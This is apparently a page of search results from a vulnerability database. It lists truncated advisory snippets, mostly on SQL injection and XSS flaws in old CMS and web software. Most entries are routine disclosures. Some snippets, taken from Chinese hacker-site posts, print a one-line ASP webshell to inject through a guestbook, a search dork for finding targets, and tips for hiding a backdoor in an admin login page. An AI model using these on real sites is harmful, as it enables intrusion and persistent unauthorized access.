9678 matches found
CVE-2010-4944
SQL injection vulnerability in the Elite Experts comeliteexperts component for Mambo and Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a showExpertProfileDetailed action to index.php...
iVIEW Suite vulnerable to SQL injection
Overview iVIEW Suite from RADVISION contains a SQL injection vulnerability. iVIEW Suite provided by RADVISION is a software to manage video conference systems in SCOPIA. iVIEW Suite contains a SQL injection vulnerability. Hirofumi Oka of NRI SecureTechnologies,Ltd. reported this vulnerability to...
Fire article back office management system V2. 1 0day-vulnerability warning-the black bar safety net
Fire article the background management system uses the secondary classification, the interface simple and generous, features simple and easy to use, can be remote automatically upload pictures Delete the article, article related images also be deleted to reduce junk files exist. First open the...
Movable Type vulnerable to SQL injection
Overview Movable Type contains SQL injection vulnerability. Movable Type, a web log system from Six Apart KK, contains a SQL injection vulnerability. Impact A remote attacker may view or modify information stored by the product. Solution Update the Software Update to the latest version according ...
phpwind pw_ajax.php和class_other.php页面远程代码执行漏洞
phpwind较高版本论坛中存在一个严重的漏洞,成功利用该漏洞可以远程执行任意php代码 pwajax.php中的 elseif $action == 'pcdelimg' InitGParray'fieldname','pctype'; InitGParray'tid','id',2; if !$tid || !$id || !$fieldname || !$pctype echo 'fail'; $id = int$id; if $pctype == 'topic' $tablename = GetTopcitable$id; elseif $pctype == 'postcate'...
PT-2010-4397 · Joomla · Ttvideo
Name of the Vulnerable Software and Affected Versions: TTVideo com ttvideo component version 1.0 for Joomla! Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved by exploiting the cid parameter in a 'video' action to 'index.php'. Recommendations: For...
CVE-2010-1949
SQL injection vulnerability in the Online News Paper Manager comjnewspaper component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the cid parameter to index.php. NOTE: some of these details are obtained from third party information...
MODx vulnerable to SQL injection
Overview MODx provided by The MODx CMS Project contains a SQL injection vulnerability. MODx provided by the MODx CMS Project is a Contents Management System CMS software. MODx contains a SQL injection vulnerability. Takeshi Terada of Mitsui Bussan Secure Directions, Inc. reported this vulnerabili...
HL-SiteManager vulnerable to SQL injection
Overview HL-SiteManager from Heartlogic contains a SQL injection vulnerability. HL-SiteManager from Heartlogic is a contents management system CMS software. HL-SiteManager contains a SQL injection vulnerability. Yuji Tounai of bogus.jp reported this vulnerability to IPA. JPCERT/CC coordinated wit...
PT-2010-2125 · Typo3 · Vote For Tt News
Name of the Vulnerable Software and Affected Versions: TYPO3 extension 'vote for tt news' version 1.0.1 and earlier Description: The issue allows remote attackers to execute arbitrary SQL commands. Recommendations: For TYPO3 extension 'vote for tt news' version 1.0.1 and earlier, update to a...
UBUNTU-CVE-2009-3582
Multiple SQL injection vulnerabilities in the delete subroutine in SQL-Ledger 2.8.24 allow remote authenticated users to execute arbitrary SQL commands via the 1 id and possibly 2 db parameters in a Delete action to the output of a VendorsReportsSearch search operation...
the web leaving the back door-vulnerability warning-the black bar safety net
First: In the administrator backend login screen to hide our Backdoor, it is relatively safe Because the administrator of the inlet is not often traded, as long as his login screen on our back door just in! Of course, you also can be flexibly inserted into the other file, as long as this file is...
New new cloud-0DAY releases-vulnerability warning-the black bar safety net
Reproduced indicate from: www.hacktc.com Keywords:inurl:/soft/show. asp? id= See what others throw out, and I also do not hide, throw out everyone playing. Vulnerability is simply to plug sentence to ASK the database, register. asp Direct access to ask, and then register the user, the password...
段富超(dfc)v1.0音乐娱乐网addgbook.asp远程写入webshell漏洞
段富超dfcv1.0音乐娱乐网是集flash动画,文章系统,网络视频,留言本、在线点歌、情感测试等功能于一体(视频栏目可以直接调用优酷土豆等视频网站视频),非常适用于flash动画作者爱好者,以及视频短片作者爱好者的个人网站。 留言处没严格过滤可直接向数据库插马 dfc1.0/addgbook.asp 在留言“你的主页”写入一句话代码,%executerequest"cmd"%,留言信息会写进date/dfc.asp 连接即可获得shell http://127.0.0.1/dfc1.0/date/dfc.asp dfc v1.0 暂无 建议用户进行严格过滤...
CVE-2009-2048
Cross-site scripting XSS vulnerability in the Administration interface in Cisco Customer Response Solutions CRS before 7.01 SR2 in Cisco Unified Contact Center Express aka CCX server allows remote authenticated users to inject arbitrary web script or HTML into the CCX database via unspecified...
CVE-2009-2048
Cross-site scripting XSS vulnerability in the Administration interface in Cisco Customer Response Solutions CRS before 7.01 SR2 in Cisco Unified Contact Center Express aka CCX server allows remote authenticated users to inject arbitrary web script or HTML into the CCX database via unspecified...
CVE-2007-6727
SQL injection vulnerability in topic.php in KerviNet Forum 1.1 allows remote attackers to execute arbitrary SQL commands via the forum parameter...
CVE-2009-2154
SQL injection vulnerability in admin/login.php in Impleo Music Collection 2.0, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the username parameter...
PT-2009-1550 · Bahar · Bahar Download Script
Name of the Vulnerable Software and Affected Versions: Bahar Download Script version 2.0 Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved via the kid parameter in the aspkat.asp file. Recommendations: For Bahar Download Script version 2.0, conside...
DEBIAN-CVE-2008-5621
Cross-site request forgery CSRF vulnerability in phpMyAdmin 2.11.x before 2.11.9.4 and 3.x before 3.1.1.0 allows remote attackers to perform unauthorized actions as the administrator via a link or IMG tag to tblstructure.php with a modified table parameter. NOTE: other unspecified pages are also...